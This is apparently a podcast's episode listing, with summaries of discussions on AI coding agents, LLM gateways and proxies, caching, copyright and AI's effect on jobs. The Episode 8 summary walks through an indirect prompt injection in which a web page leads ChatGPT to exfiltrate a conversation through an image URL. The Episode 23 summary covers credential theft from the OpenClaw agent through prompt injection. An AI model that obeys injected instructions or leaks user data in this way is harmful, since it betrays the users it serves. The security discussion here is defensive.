Episodes

  • Episode 4: Claude Code Github Action
    Aug 19 2025

    In this episode of Before the Commit, the hosts dive deep into the evolving landscape of software development, automation, and AI’s role in reshaping industries beyond tech. The discussion spans GitHub Actions with Cloud Code, the challenges of technical debt in an AI-driven era, the evolution of agile practices, and the disruptive effects of AI in creative fields like music and film.

    The conversation opens with a focus on Cloud Code, which has emerged as both a CLI tool and SDK rather than a traditional IDE. When paired with GitHub Actions, Cloud Code allows for asynchronous automation of tasks such as issue creation, code reviews, and pull requests. Unlike early “cursor background agents” that felt heavy and remote, Cloud Code provides a seamless and lightweight approach that enables developers to collaborate with AI in real time within their workflows.

    The hosts emphasize that while AI agents can handle much of the routine coding, the real challenge lies in how humans set up tasks and acceptance criteria. AI thrives when expectations are clearly defined, but complex, production-ready solutions still require human oversight. The emerging pattern is that AI can complete roughly 80–90% of development, while humans step in for the final polish—similar to a party planner fine-tuning the last details after their team has done the bulk of the setup.

    A central theme is whether technical debt still matters in an AI-first world. Traditionally, engineering teams have struggled with pressure from sales or business teams to deliver features quickly, leading to cut corners that accumulate as debt. However, with AI accelerating refactors and experimentation, the cost of “debt” may be far lower. The hosts argue that while inadvertent mistakes will still occur, the ability to quickly re-architect or refactor with AI challenges the old obsession with minimizing technical debt at all costs.

    The discussion pivots to the agile manifesto, now over 24 years old, and its evolution. Agile was never about rigid rules, but about moving away from the rigid, plan-everything-upfront waterfall model. Agile’s core value was early customer validation: deliver something quickly, get feedback, and adjust. With AI enabling rapid feature development, the dream of true continuous deployment—even faster than sprint cycles—may finally be achievable.

    The hosts highlight that agile and waterfall are not opposites but tools for different contexts. Waterfall is suited for predictable, high-stakes projects like launching rockets, while agile thrives in unpredictable markets where customer needs evolve rapidly.

    The conversation then shifts beyond coding, exploring how AI is reshaping music, film, and other arts.

    • AI-generated music: Some songs are now created entirely by AI, even mimicking collaborations between famous artists. While debates rage about copyright and originality, the hosts point out that no artist creates in a vacuum—every musician is influenced by predecessors. AI is no different, learning from prior works but generating unique compositions.

    • Ethics and ownership: Questions remain about who controls an artist’s likeness or style after death. The example of Princess Leia’s reappearance in Star Wars: Rise of Skywalker illustrates both the potential and controversy of resurrecting performers digitally.

    • Democratizing creativity: Just as AI empowers developers to experiment broadly, it lowers barriers in music and film. Individuals without traditional training can now compose songs, animate photos, or even produce short films. This mirrors past disruptions like Napster, SoundCloud, and streaming platforms.

    The hosts envision a future where movies, music, and games are dynamically tailored to individual preferences, with users even commissioning personal, high-quality films for themselves.

    Show More Show Less
    1 hr and 5 mins
  • Episode 8: LLM Caching
    Sep 23 2025

    In this episode, the hosts discuss the latest news and trends in AI, focusing on LLM caching, a new EU regulation on AI-generated code, the changing landscape for Stack Overflow, and a recent AI security vulnerability.

    The hosts explain LLM caching as a technique to boost efficiency and cut costs for AI providers and developers. It involves saving parts of a prompt that are sent repeatedly, such as tool descriptions for a code agent or a developer's code. This means the content doesn't need to be re-tokenized each time, saving computational power. Providers offer a reduced rate for these cached tokens.

    The discussion also highlights proxies like Light LLM, which can cache and reuse responses for multiple users even if their prompts aren't identical. This is achieved through semantic caching, which understands the meaning of words, allowing similar queries to receive the same cached answer.

    The hosts express skepticism about the European Union's new AI Act, which mandates that any code "substantially generated or assisted by an AI system" must be clearly identified. This "AI watermarking" aims to increase transparency, but it has open-source platforms debating whether to accept AI-generated code contributions at all due to legal and compliance issues.

    One host questions the regulation's practicality, seeing it as a fear-based, "proactive" measure for a problem that hasn't yet been observed. They point out the difficulty of reliably detecting and labeling AI-written code, especially as AI models improve at mimicking human styles. The hosts also note a study showing that AI coding assistants are more likely to introduce security vulnerabilities because they are trained on public code that often contains bugs and outdated security practices.

    The podcast covers the decline of Stack Overflow, attributing it to the rise of generative AI tools. Traffic has dropped, and Stack Overflow has responded by partnering with OpenAI to provide its data and adding its own AI features. The hosts believe Stack Overflow's data is a valuable asset that should be monetized rather than scraped.

    They conclude that Stack Overflow and similar content websites face a "generational problem." Younger users are less likely to use traditional sites, preferring integrated experiences like chatbots and AI assistants. They compare the future of the internet to a "Netflix algorithm," where AI will guide users directly to the content they need.

    In their "Secure or Sus" segment, the hosts discuss a security flaw that allows a threat actor to steal a user's ChatGPT conversation through an "indirect prompt injection." The attacker uploads a malicious prompt to a public website. When a user interacts with it, ChatGPT is tricked into generating an image whose URL secretly contains the user's conversation. The image then sends the conversation to the attacker's server.

    The hosts explain that this type of data exfiltration attack can be prevented with defensive measures like an LLM proxy and input/output sanitization. They note that similar vulnerabilities could exist in other AI-driven platforms and conclude that security in the age of AI requires proactive, disciplined measures rather than simply reacting to known vulnerabilities.

    Show More Show Less
    1 hr and 18 mins
  • Episode 26: Agent Client Protocol and Antigravity
    Mar 18 2026

    This video transcript covers several key topics related to AI and technology, with a particular focus on Nvidia's new inference chips, the Agent Client Protocol (ACP), and Google's Anti Gravity IDE.Nvidia's GTC 2026 event highlighted their advancements in inference chips, emphasizing a "one chip for all" approach that can be used for both training and inference. This strategic shift is driven by rising data center costs and the growing demand for AI applications. Nvidia has already secured adoption from major cloud providers like AWS, Azure, and Google Cloud, as well as companies like ByteDance and PayPal. The new "Dynamo" chip is designed for data centers, orchestrating GPU memory resources to boost inference performance by up to seven times. It's noted that this chip is open-source, though the definition of open-source in AI is considered nuanced. The chip is specifically tailored for agentic AI workloads, optimizing request routing to GPUs with relevant short-term memory, moving beyond traditional chatbot applications.The discussion then shifts to the competitive landscape, mentioning specialized inference chips from companies like Groq and Cerebras, which have focused on optimizing solely for inference, reportedly achieving better results and cost-effectiveness than the "one chip for all" approach. Nvidia's acquisition of Groq for $20 billion is seen as a move to integrate this technology and avoid direct competition. The transcript also touches upon the geopolitical implications of AI chip supply chains, with tariffs and export controls being discussed as potential "weapons."A significant portion of the transcript is dedicated to the Agent Client Protocol (ACP). It's described as an open protocol that acts as a middleware layer between Integrated Development Environments (IDEs) and coding agents. ACP aims to standardize communication, allowing coding agents to interact with various IDEs seamlessly. This is compared to the Language Server Protocol (LSP), which standardized IDEs' understanding of programming languages. ACP was developed collaboratively by JetBrains and Zed Industries to address the need for a universal adapter for coding agents, enabling them to perform actions within IDEs like opening files, manipulating code, and interacting with the UI. Several IDEs, including Zed, JetBrains products, Neovim, and VS Code (via a plugin), are adopting ACP. Most coding agents also support it, with Google's Anti Gravity being a recent addition. The benefit of ACP is that it makes coding agents IDE-agnostic, allowing for easier integration and a more modular ecosystem.Google's Anti Gravity is presented as a new IDE for coding agents, built with an "agent manager" at its core, contrasting with the CLI-first approach of some other agents. It offers features like workspaces for managing different projects and threads for concurrent agent tasks within a workspace. Anti Gravity also includes "artifacts" such as walkthroughs (session synopses), browser recordings, and persistent memory, which are integral to its functionality. The IDE's ability to handle multiple agents and tasks within a unified interface, particularly through its inbox view, is highlighted as a significant advantage for user experience. The transcript also mentions that Anti Gravity can integrate with various AI models via API keys, with Gemini models currently being free during its preview phase. The discussion touches on the potential for a more unified control plane for agent orchestration and the future of AI development moving towards local, optimized models.

    Show More Show Less
    1 hr and 3 mins
  • Episode 28: Cloudflare AI Gateway
    Apr 15 2026

    The video discusses several key topics related to AI and its impact on the tech industry.Firstly, it delves into Anthropic's "Mythos" model and "Project Glasswing." The speaker expresses skepticism about the hyped claims surrounding Mythos, suggesting that the limited release might be due to resource constraints (GPU availability) rather than its groundbreaking capabilities. The speaker draws parallels to Anthropic's past PR strategies, citing the "blackmailed engineer" story as an example of manufactured hype.Secondly, the video addresses the perceived "nerfing" of Anthropic's Claude Code. The speaker details a series of changes, including the introduction of "adaptive thinking," a reduction in default "effort" settings from high to medium, and the removal of visible "thinking" logs from the UI. These changes, while potentially offering cost savings for Anthropic, have led to performance degradation for users, particularly those engaging in complex tasks. The speaker notes that while these changes can be reverted manually, the opt-out nature and the timing of these updates are concerning.Thirdly, the discussion shifts to Cloudflare's AI Gateway. The speaker highlights its features, including virtual gateways with unique hashes for custom rules, compatibility with various SDKs (OpenAI, Anthropic), and logging capabilities. A key aspect is Cloudflare's use of Llama for processing "guardrails," which are implemented for content moderation (e.g., blocking defamation or political content). The speaker also notes the limitations of these guardrails, such as the lack of regex support for sensitive data like API keys, suggesting the gateway is more suited for corporate chatbots than coding environments. The caching, rate limiting, and alias features for API keys are also discussed as beneficial for managing AI access.Finally, the video touches upon the impact of AI on junior engineers. Statistics are presented indicating a decline in "programmer" job postings, contrasting with a smaller drop in "software developer" roles. The speaker suggests a shift from task-based junior roles to more AI-centric orchestration of agents. The speaker predicts a future shortage of software engineers, with companies increasingly needing junior engineers to manage AI systems, thereby elevating the importance of mentorship in AI agent management. The video concludes with a broader discussion on how AI is transforming various careers and the need for educational institutions to adapt their curricula to include AI proficiency. The overall sentiment is that while AI adoption presents challenges, it also creates significant opportunities for those who embrace it.

    Show More Show Less
    1 hr and 4 mins
  • Episode 23: OpenClaw
    Feb 11 2026

    Welcome everybody to Before the Commit episode 23. With me as usual, I have my friend Dustin Hillgartner. This week, we're talking about Open Claw, all things Open Claw. There's really not much more to say other than we hope to break down what it is, some of the risks associated with it, and why it might actually be a good thing.

    Open Claw is an open-source agent framework with potential benefits but significant security risks due to its broad access capabilities. It can integrate with messaging apps and utilizes a "skills" system for instructions. A scan revealed many internet-accessible instances, suggesting users may be unaware of the security implications. Risks include prompt injection attacks and plain-text credential storage. Prominent figures have advised caution.

    By default, Open Claw can expose all granted access. Exploits can involve retrieving credentials through prompt engineering. Its integration with messaging apps widens the attack surface. Key security concerns include lack of scoping, untrusted context sources, maximum privilege by default, and vulnerability to single-point compromises via prompt injection. The project's ease of misconfiguration and adoption by non-technical users exacerbate these issues.

    ModSecOps principles highlight Open Claw's lack of security: skills execute with full permissions, context is untrusted, and it defaults to maximum privilege. Unlike multi-agent systems with adversarial reviews, Open Claw's single-agent design is susceptible to prompt injection attacks. Exploits can bypass safety controls entirely. The analogy of an unquestioning employee with full access to sensitive data aptly describes its risk. Its open-source nature, while fostering development, also allows rapid exploitation, potentially spreading like a worm. Unpatched vulnerabilities and a lack of developer response further compound these dangers.

    Show More Show Less
    1 hr and 4 mins
  • Episode 19: Ralph Wiggum and Grok Heavy
    Jan 9 2026

    **Tailwind Labs and AI's Impact on Business Models:**\The conversation begins by examining how AI is affecting established open-source projects like Tailwind Labs. Traditionally, companies monetize open-source by offering premium add-ons or services. However, AI, by enabling users to generate code and potentially create custom solutions internally, is seen as "cannibalizing" these revenue streams. This phenomenon is termed "AI Vampire Economics," where AI's capabilities reduce the need for pre-packaged solutions, impacting companies that rely on traffic to their websites for upselling. The example of Stack Overflow is mentioned, noting a decrease in traffic and new questions as AI tools provide answers directly. This trend is expected to impact many businesses that offer services built around developer tools and content.**The "Build vs. Buy" Equation Revolutionized by AI:**\AI is fundamentally altering the economic calculation of whether to build software solutions internally or purchase them as a service (SaaS). Previously, startups would buy essential services like ticketing or CRM systems due to the high development cost and time involved, allowing them to focus on their core intellectual property. Now, with AI coding assistants, building custom solutions internally can be significantly faster and more cost-effective. This shift allows for greater control over roadmaps and customization, potentially disrupting the SaaS market by enabling companies to create tailored solutions for specific needs without lengthy development cycles or reliance on third-party vendors.**"Ralph Wiggum" Technique and Autonomous AI Agents:**\A significant portion of the discussion revolves around the "Ralph Wiggum" technique, named after the Simpsons character who repeats himself. This technique involves using a bash script to repeatedly call an LLM (like Claude) with the same prompt. This is useful because LLMs have limitations in processing very long or complex tasks in a single pass. The Ralph Wiggum loop allows for the iterative completion of tasks, such as processing a long checklist or generating extensive documentation, by feeding the output of one prompt back into the next. The technique can be applied via CLI, SDKs (like Python), or integrated into CI/CD pipelines. It's highlighted that this technique is not exclusive to Claude but can be used with various LLMs and is particularly valuable for tasks requiring sustained, multi-step execution that would otherwise require constant human intervention. The discussion also touches on the importance of setting "max iterations" to prevent infinite loops and manage costs, especially with probabilistic AI models.**Grok Heavy and the Future of AI Research:**\The conversation then shifts to Grok Heavy, an AI model from xAI. While Grok is noted for its strengths in scientific and mathematical problem-solving, the discussion contrasts its capabilities with Claude's AI coding ecosystem. Grok Heavy is described as potentially being more powerful for complex, specialized problems, capable of spinning up multiple "agents" (instances of Grok) to tackle a single issue. However, it lacks the sophisticated orchestration and context engineering that Claude Code provides, making it less effective for general coding tasks where integrating with existing codebases and tools is crucial. The article also explores the broader implications of LLMs evolving beyond simple text prediction due to tool-calling capabilities, making them more powerful and, consequently, potentially more dangerous if not managed with robust safety measures and ethical considerations. The importance of AI "character" and responsible development, especially concerning autonomous decision-making in critical areas like healthcare and weaponry, is emphasized.

    Show More Show Less
    1 hr and 12 mins
  • Episode 7: LiteLLM
    Sep 9 2025

    Hosts Dustin Hillgartner and Danny Gershman discuss securing large language models (LLMs) amid rising "shadow AI" risks, where employees use unmonitored tools like ChatGPT, leading to unintentional data spills (e.g., sensitive info, code). Echoing shadow IT, they stress education, policies, and multi-layered defenses over bans, as prohibition drives underground use—studies show ~40% of workers admit to AI usage despite restrictions.

    LightLLM: Open-Source LLM Proxy

    Central focus: LightLLM as a tool to combat shadow AI. It's a proxy funneling all LLM calls through a controlled channel, blocking public providers (e.g., forcing use of secure ones like AWS Bedrock GovCloud). Key features:

    - Visibility & Tracking: Logs usage, errors, spending per employee/team; identifies high performers needing training.

    - Security: Guardrails (WAF-like) scan/ block sensitive data (e.g., API keys, code) before transmission; supports RBAC via virtual keys from secret stores (e.g., AWS/Azure), preventing shared master keys.

    - Management: Rate limiting, budgets, load balancing across providers/models; fallbacks if limits hit; RAG integration for team-specific data/models (e.g., support vs. data science).

    - Integration: Pipes logs to observability tools; open-source core, enterprise version adds SSO.

    Not a silver bullet, but enables safe, company-provided AI to boost productivity without leaks. Encourages "bring your own model" policies with oversight, avoiding moral hazards like unvetted tools exposing IP/HIPAA data. In gov/defense, it ensures FedRAMP compliance.

    IDE Exploration: Warp

    Brief dive into Warp, a terminal-first AI CLI (vs. code-first like VS Code/Cursor). Competes with Claude Code; runs as standalone app with natural language prompts (e.g., "change directory to X") for bash tasks (Git history, logs, Kubernetes). Adds side panels for coding (rules, autocomplete). Scope spans entire hard drive (powerful for workflows but raises privacy concerns—data sent?). Hosts note it's like an "AI makefile" for your computer, but terminal focus feels secondary for pure coding. Ties to NVIDIA CEO's quip: "English is the new coding language."

    AI in Gov Contracting

    AI lowers barriers for proposals (e.g., auto-generating 10-page whitepapers), homogenizing responses and flooding SAM.gov. Makes differentiation hard; calls for more human eval (demos, prototypes via OTAs) over paper reviews. Gov should adopt private-sector agility (trials, betas) while maintaining security—less bespoke risk, more platforms.

    Coding's Future & Security

    Debate: Will coding devolve to English/binary? Source code aids compliance/trust now (static analysis for vulnerabilities), but dynamic testing (fuzzing, WAFs) could mature to make it obsolete. AI as "Play-Doh machine at light speed" needs guardrails to avoid chaos; interim relies on human oversight.

    Newz or Noize

    - Anthropic Lawsuit: $1.5B class action for training on ~500K pirated copyrighted books from shadow libraries. Publishers seek payouts; signals wave of suits (OpenAI, Grok next?). Reddit sued Anthropic separately in June over data scraping.

    - Copyright in AI Era: Fair use debate—reading/learning OK, but mass ingestion for commercial models? Humans can't replicate styles en masse; AI can (e.g., "new Game of Thrones"). Needs evolved laws: license data, monetize via new models (like Napster → streaming). Frequency/scalability challenges enforcement; transformative use key.

    - AI in Film: Reconstructing lost 40-min Orson Welles footage (1940s) using old photos/radio + AI.

    Show More Show Less
    1 hr and 6 mins
  • Episode 29: Agentgateway and Portkey
    Apr 23 2026

    Here's a summary of the video transcript:The podcast episode covers several key topics related to AI and technology.**SpaceX Acquires Cursor:** A significant portion of the discussion revolves around SpaceX's potential acquisition of Cursor, an AI-powered code editor. The deal is valued at $60 billion, highlighting the increasing value placed on AI and software development tools. The merger of XAI (Elon Musk's AI company) into SpaceX is explained as the entity behind this acquisition. This move is seen as SpaceX's strategy to bolster its AI capabilities, particularly in coding, by acquiring Cursor's technology and talent. The acquisition is also discussed in the context of existing AI coding tools like Claude Code and OpenAI's Codex.**The Value of Software and Talent:** The high valuation of Cursor, a company that emerged recently, underscores the immense value of software and the engineering talent behind it. The discussion touches on the idea of "acqui-hiring," where companies acquire others primarily for their skilled workforce. The $60 billion figure is considered substantial, even for an "aqua hire," emphasizing the scarcity and importance of specialized AI and software engineering talent.**AI Gateways: Portkey and Agent Gateway:** The "Tool of the Week" segment delves into AI gateways.- **Agent Gateway (Solo AI):** This solution is described as a Kubernetes-based orchestration tool for managing AI agents. It focuses on providing governance, policies, and routing rules for containerized AI agents within a Kubernetes cluster, integrating with tools like Istio. It's positioned as an "AI governance" solution for managing inter-agent communication.- **Portkey:** This is presented as a SaaS-based AI gateway that acts as a proxy server. It offers features like user management, analytics, logging, and a robust system for managing API keys, prompts, and guardrails. A unique aspect highlighted is Portkey's ability to manage prompts and their versioning outside of application code, enabling A/B testing and easier modification of AI behavior without code changes. It also supports agent integration via the A2A protocol.**AI's Impact on the Workforce and Layoffs:** The podcast discusses the broader implications of AI on employment. Snap's recent layoff of 1,000 employees is cited, with the CEO attributing it to AI taking over a significant portion of coding tasks (over 65%). This sparks a discussion on whether these layoffs are due to overhiring or a genuine shift in required skills, suggesting that companies are adapting to AI's capabilities by seeking new types of talent or upskilling existing employees. The trend is seen as a leading indicator for other industries, implying a future where AI augmentation or replacement of roles will become more common across various departments, not just engineering.**AI and Copyright Concerns:** A significant legal development is discussed: Anthropic's argument before a federal judge that training its AI models on copyrighted song lyrics constitutes "transformative fair use." This case is seen as setting important legal precedents for the entire AI industry regarding the use of copyrighted data for training. The discussion touches on the vast scale of data used in AI training, the immense potential copyright infringement damages, and the practical challenges of enforcing these laws in the AI era. The analogy is made between how humans learn from creative works and how AI models are trained, raising questions about the future of intellectual property in the age of AI.

    Show More Show Less
    1 hr